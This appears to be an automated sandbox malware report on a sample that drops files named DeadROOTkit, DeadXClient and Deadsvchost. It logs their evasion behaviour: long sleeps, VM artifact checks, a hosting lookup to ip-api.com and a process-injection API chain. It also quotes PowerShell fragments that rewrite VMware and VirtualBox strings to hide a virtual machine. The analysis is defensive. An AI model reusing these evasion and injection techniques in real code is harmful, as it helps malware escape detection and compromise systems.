                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                          Source: C:\Windows\System32\dllhost.exe Code function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,6_2_0000000140001854
                          Source: C:\Users\Public\DeadXClient.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                          Source: DeadROOTkit.exe, 00000002.00000002.2956134718.0000000002311000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
                          Source: mIURiU8n2P.exe, 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000000.1701692705.00000000001A2000.00000002.00000001.01000000.00000008.sdmp, DeadROOTkit.exe.2.dr Binary or memory string: SBIEDLL.DLLINFO
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exe Memory allocated: A20000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exe Memory allocated: 1A780000 memory reserve | memory write watch
                          Source: C:\Users\Public\DeadXClient.exe Memory allocated: EC0000 memory reserve | memory write watch
                          Source: C:\Users\Public\DeadXClient.exe Memory allocated: 1A900000 memory reserve | memory write watch
                          Source: C:\Users\Public\DeadROOTkit.exe Memory allocated: 8D0000 memory reserve | memory write watch
                          Source: C:\Users\Public\DeadROOTkit.exe Memory allocated: 1A310000 memory reserve | memory write watch
                          Source: C:\Users\Public\Deadsvchost.exe Memory allocated: 10C0000 memory reserve | memory write watch
                          Source: C:\Users\Public\Deadsvchost.exe Memory allocated: 1AD40000 memory reserve | memory write watch
                          Source: C:\Users\Public\Deadsvchost.exe Memory allocated: A20000 memory reserve | memory write watch
                          Source: C:\Users\Public\Deadsvchost.exe Memory allocated: 1A4A0000 memory reserve | memory write watch
                          Source: C:\Users\Public\Deadsvchost.exe Memory allocated: 10A0000 memory reserve | memory write watch
                          Source: C:\Users\Public\Deadsvchost.exe Memory allocated: 1AE80000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Users\Public\DeadXClient.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 600000
                          Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 599875
                          Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 599765
                          Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 599640
                          Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 599531
                          Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 599421
                          Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 599293
                          Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 599133
                          Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 598741
                          Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 598568
                          Source: C:\Users\Public\DeadROOTkit.exe Thread delayed: delay time: 598440
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\dllhost.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Users\Public\Deadsvchost.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Users\Public\DeadXClient.exe Window / User API: threadDelayed 6514
                          Source: C:\Users\Public\DeadXClient.exe Window / User API: threadDelayed 3143
                          Source: C:\Users\Public\DeadROOTkit.exe Window / User API: threadDelayed 3804
                          Source: C:\Users\Public\DeadROOTkit.exe Window / User API: threadDelayed 5987
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3822
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5329
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8065
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1186
                          Source: C:\Windows\System32\winlogon.exe Window / User API: threadDelayed 8849
                          Source: C:\Windows\System32\winlogon.exe Window / User API: threadDelayed 1151
                          Source: C:\Windows\System32\lsass.exe Window / User API: threadDelayed 9914
                          Source: C:\Windows\System32\dwm.exe Window / User API: threadDelayed 9863
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9353
                          Source: C:\Windows\System32\dllhost.exe Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess graph_6-7286
                          Source: C:\Windows\System32\dllhost.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep graph_6-8409
                          Source: C:\Users\Public\DeadCodeRootKit.exe Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess graph_3-244
                          Source: C:\Windows\System32\dllhost.exe Evasive API call chain: RegQueryValue,DecisionNodes,ExitProcess graph_6-7290
                          Source: C:\Windows\System32\dllhost.exe Check user administrative privileges: GetTokenInformation,DecisionNodes graph_6-7236
                          Source: C:\Windows\System32\lsass.exe API coverage: 7.3 %
                          Source: C:\Windows\System32\svchost.exe API coverage: 5.6 %
                          Source: C:\Windows\System32\svchost.exe API coverage: 5.5 %
                          Source: C:\Windows\System32\svchost.exe API coverage: 6.2 %
                          Source: C:\Windows\System32\svchost.exe API coverage: 5.6 %
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exe TID: 5164 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\Public\DeadXClient.exe TID: 7384 Thread sleep time: -8301034833169293s >= -30000s
                          Source: C:\Users\Public\DeadXClient.exe TID: 7396 Thread sleep count: 6514 > 30
                          Source: C:\Users\Public\DeadXClient.exe TID: 7396 Thread sleep count: 3143 > 30
                          Source: C:\Users\Public\DeadROOTkit.exe TID: 7344 Thread sleep time: -36893488147419080s >= -30000s
                          Source: C:\Users\Public\DeadROOTkit.exe TID: 7344 Thread sleep time: -600000s >= -30000s
                          Source: C:\Users\Public\DeadROOTkit.exe TID: 7344 Thread sleep time: -599875s >= -30000s
                          Source: C:\Users\Public\DeadROOTkit.exe TID: 7344 Thread sleep time: -599765s >= -30000s
                          Source: C:\Users\Public\DeadROOTkit.exe TID: 7344 Thread sleep time: -599640s >= -30000s
                          Source: C:\Users\Public\DeadROOTkit.exe TID: 7344 Thread sleep time: -599531s >= -30000s
                          Source: C:\Users\Public\DeadROOTkit.exe TID: 7344 Thread sleep time: -599421s >= -30000s
                          Source: C:\Users\Public\DeadROOTkit.exe TID: 7344 Thread sleep time: -599293s >= -30000s
                          Source: C:\Users\Public\DeadROOTkit.exe TID: 7344 Thread sleep time: -599133s >= -30000s
                          Source: C:\Users\Public\DeadROOTkit.exe TID: 7344 Thread sleep time: -598741s >= -30000s
                          Source: C:\Users\Public\DeadROOTkit.exe TID: 7344 Thread sleep time: -598568s >= -30000s
                          Source: C:\Users\Public\DeadROOTkit.exe TID: 7344 Thread sleep time: -598440s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5680 Thread sleep count: 3822 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5680 Thread sleep count: 5329 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5744 Thread sleep time: -9223372036854770s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6128 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\dllhost.exe TID: 7356 Thread sleep count: 340 > 30
                          Source: C:\Windows\System32\dllhost.exe TID: 7356 Thread sleep time: -34000s >= -30000s
                          Source: C:\Windows\System32\dllhost.exe TID: 6920 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7372 Thread sleep time: -8301034833169293s >= -30000s
                          Source: C:\Windows\System32\winlogon.exe TID: 7420 Thread sleep count: 8849 > 30
                          Source: C:\Windows\System32\winlogon.exe TID: 7420 Thread sleep time: -8849000s >= -30000s
                          Source: C:\Windows\System32\winlogon.exe TID: 7420 Thread sleep count: 1151 > 30
                          Source: C:\Windows\System32\winlogon.exe TID: 7420 Thread sleep time: -1151000s >= -30000s
                          Source: C:\Windows\System32\lsass.exe TID: 7476 Thread sleep count: 9914 > 30
                          Source: C:\Windows\System32\lsass.exe TID: 7476 Thread sleep time: -9914000s >= -30000s
                          Source: C:\Users\Public\Deadsvchost.exe TID: 7484 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 7552 Thread sleep count: 241 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 7552 Thread sleep time: -241000s >= -30000s
                          Source: C:\Windows\System32\dwm.exe TID: 7600 Thread sleep count: 9863 > 30
                          Source: C:\Windows\System32\dwm.exe TID: 7600 Thread sleep time: -9863000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 7644 Thread sleep count: 249 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 7644 Thread sleep time: -249000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 7664 Thread sleep count: 251 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 7664 Thread sleep time: -251000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 7672 Thread sleep count: 252 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 7672 Thread sleep time: -252000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 7680 Thread sleep count: 247 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 7680 Thread sleep time: -247000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 7696 Thread sleep count: 201 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 7696 Thread sleep time: -201000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 7776 Thread sleep count: 80 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 7776 Thread sleep time: -80000s >= -30000s
                          Source: C:\Users\Public\Deadsvchost.exe TID: 7720 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 7796 Thread sleep count: 82 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 7796 Thread sleep time: -82000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 7828 Thread sleep count: 238 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 7828 Thread sleep time: -238000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 7864 Thread sleep count: 69 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 7864 Thread sleep time: -69000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 7988 Thread sleep count: 243 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 7988 Thread sleep time: -243000s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8008 Thread sleep time: -5534023222112862s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 8004 Thread sleep count: 247 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 8004 Thread sleep time: -247000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 8020 Thread sleep count: 243 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 8020 Thread sleep time: -243000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 8096 Thread sleep count: 249 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 8096 Thread sleep time: -249000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 8104 Thread sleep count: 251 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 8104 Thread sleep time: -251000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 8128 Thread sleep count: 62 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 8128 Thread sleep time: -62000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 8160 Thread sleep count: 250 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 8160 Thread sleep time: -250000s >= -30000s
                          Source: C:\Users\Public\Deadsvchost.exe TID: 8152 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 8180 Thread sleep count: 244 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 8180 Thread sleep time: -244000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 8188 Thread sleep count: 226 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 8188 Thread sleep time: -226000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 7264 Thread sleep count: 248 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 7264 Thread sleep time: -248000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 7248 Thread sleep count: 237 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 7248 Thread sleep time: -237000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 7308 Thread sleep count: 249 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 7308 Thread sleep time: -249000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 6804 Thread sleep count: 52 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 6804 Thread sleep time: -52000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 5820 Thread sleep count: 53 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 5820 Thread sleep time: -53000s >= -30000s
                          Source: C:\Windows\System32\spoolsv.exe TID: 6096 Thread sleep count: 185 > 30
                          Source: C:\Windows\System32\spoolsv.exe TID: 6096 Thread sleep time: -185000s >= -30000s
                          Source: C:\Users\Public\DeadROOTkit.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                          Source: C:\Windows\System32\dllhost.exe Last function: Thread delayed
                          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                          Source: C:\Windows\System32\winlogon.exe Last function: Thread delayed
                          Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
                          Source: C:\Windows\System32\spoolsv.exe Last function: Thread delayed
                          Source: C:\Users\Public\DeadXClient.exe File Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\Public\DeadROOTkit.exe File Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\Public\Deadsvchost.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\Public\Deadsvchost.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\Public\Deadsvchost.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Windows\System32\dllhost.exeCode function: 6_2_000002E86A09BF5C FindFirstFileExW,6_2_000002E86A09BF5C
                          Source: C:\Windows\System32\winlogon.exeCode function: 11_2_00000225DC64BF5C FindFirstFileExW,11_2_00000225DC64BF5C
                          Source: C:\Windows\System32\lsass.exeCode function: 12_2_00000202C0AEBF5C FindFirstFileExW,12_2_00000202C0AEBF5C
                          Source: C:\Windows\System32\svchost.exeCode function: 14_2_000002A66130BF5C FindFirstFileExW,14_2_000002A66130BF5C
                          Source: C:\Windows\System32\dwm.exeCode function: 16_2_000002BAAF21BF5C FindFirstFileExW,16_2_000002BAAF21BF5C
                          Source: C:\Windows\System32\svchost.exeCode function: 17_2_0000026A879CBF5C FindFirstFileExW,17_2_0000026A879CBF5C
                          Source: C:\Windows\System32\svchost.exeCode function: 19_2_00000179537ABF5C FindFirstFileExW,19_2_00000179537ABF5C
                          Source: C:\Windows\System32\svchost.exeCode function: 20_2_000002295D56BF5C FindFirstFileExW,20_2_000002295D56BF5C
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\Public\DeadXClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeThread delayed: delay time: 599875Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeThread delayed: delay time: 599765Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeThread delayed: delay time: 599640Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeThread delayed: delay time: 599531Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeThread delayed: delay time: 599421Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeThread delayed: delay time: 599293Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeThread delayed: delay time: 599133Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeThread delayed: delay time: 598741Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeThread delayed: delay time: 598568Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeThread delayed: delay time: 598440Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\Public\Deadsvchost.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\Public\Deadsvchost.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\Public\Deadsvchost.exeThread delayed: delay time: 922337203685477
                          Source: lsass.exe, 0000000C.00000002.2952382254.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
                          Source: svchost.exe, 0000002E.00000002.2936876643.000002644A62B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.25.drBinary or memory string: VMware SATA CD00
                          Source: svchost.exe, 00000016.00000002.3003322071.000001845BC0A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
                          Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.25.drBinary or memory string: NECVMWarVMware SATA CD00
                          Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.25.drBinary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
                          Source: DeadXClient.exe, 00000001.00000002.3027772809.000000001B950000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWpe="%SystemRoot%\system32\mswsock.dll Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"
                          Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.25.drBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
                          Source: dwm.exe, 00000010.00000002.3015392657.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000S
                          Source: svchost.exe, 00000019.00000003.1884989548.000001D5593A4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
                          Source: svchost.exe, 0000002E.00000000.1971368837.000002644A702000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.25.drBinary or memory string: storahciNECVMWarVMware SATA CD00
                          Source: svchost.exe, 0000002E.00000000.1971007681.000002644A62B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.25.drBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
                          Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.25.drBinary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
                          Source: Microsoft-Windows-PowerShell%4Operational.evtx.25.drBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
                          Source: DeadROOTkit.exe, 00000002.00000002.2999435722.000000001B1C0000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2947445090.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763056883.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2944371275.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000E.00000000.1779615451.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.1828161569.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2938538248.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.1830040806.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.2938017743.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.1834191940.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2955372559.000001845AC3F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: svchost.exe, 0000000E.00000000.1779646224.000002A66062A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                          Source: System.evtx.25.drBinary or memory string: VMCI: Using capabilities (0x1c).
                          Source: lsass.exe, 0000000C.00000002.2952382254.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
                          Source: Microsoft-Windows-PowerShell%4Operational.evtx.25.drBinary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
                          Source: svchost.exe, 0000002E.00000002.2936876643.000002644A62B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: &@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: svchost.exe, 0000002E.00000002.2936876643.000002644A62B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}1e
                          Source: DeadROOTkit.exe.2.drBinary or memory string: vmware
                          Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.25.drBinary or memory string: nonicNECVMWarVMware SATA CD00
                          Source: svchost.exe, 00000019.00000000.1856908849.000001D55862B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2952389964.000001D55862B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor
                          Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.25.drBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
                          Source: lsass.exe, 0000000C.00000000.1766962440.00000202C037F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
                          Source: Microsoft-Windows-PowerShell%4Operational.evtx.25.drBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
                          Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.25.drBinary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
                          Source: svchost.exe, 0000002E.00000000.1971175317.000002644A640000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000.ifo
                          Source: svchost.exe, 0000002E.00000000.1971007681.000002644A62B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: &@\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: svchost.exe, 00000019.00000002.2953316253.000001D558643000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@vmcitpA
                          Source: svchost.exe, 0000000E.00000002.2949507615.000002A66066B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                          Source: svchost.exe, 00000024.00000002.2936162051.0000023FD3802000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                          Source: lsass.exe, 0000000C.00000002.2952382254.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
                          Source: svchost.exe, 00000019.00000000.1858871917.000001D5592C3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dowvmci
                          Source: Microsoft-Windows-Ntfs%4Operational.evtx.25.drBinary or memory string: VMware
                          Source: Microsoft-Windows-PushNotification-Platform%4Operational.evtx.25.drBinary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                          Source: Microsoft-Windows-PowerShell%4Operational.evtx.25.drBinary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
                          Source: DeadXClient.exe, 00000001.00000002.2920271280.0000000000AD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: Microsoft-Windows-PowerShell%4Operational.evtx.25.drBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
                          Source: svchost.exe, 0000002E.00000002.2936876643.000002644A62B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
